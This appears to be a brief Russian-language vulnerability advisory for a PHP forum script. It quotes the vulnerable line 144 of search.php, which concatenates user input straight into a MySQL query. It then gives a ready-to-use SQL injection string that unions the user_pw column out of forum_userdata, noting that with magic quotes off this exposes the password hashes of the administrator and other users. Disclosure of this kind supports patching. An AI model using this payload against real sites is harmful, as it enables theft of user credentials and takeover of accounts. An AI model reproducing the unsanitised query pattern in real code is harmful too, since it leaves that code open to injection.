1) Уязвимый код находится в строке 144 search.php:
$result = mysql_query(«SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL „.
$time_difference.“ HOUR,'».$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time + INTERVAL «.$time_difference.» HOUR, '".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM «.$forum_table.»
WHERE «.$search_string.» ORDER BY tid DESC, time ASC LIMIT «.$ul.», "
.$settings['search_results_per_page'], $connid);
На странице поиска можно сформировать SQL-запрос таким образом:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
Если magic quotes выключены, то можно просмотреть hash пароля администратора и
пользователей.
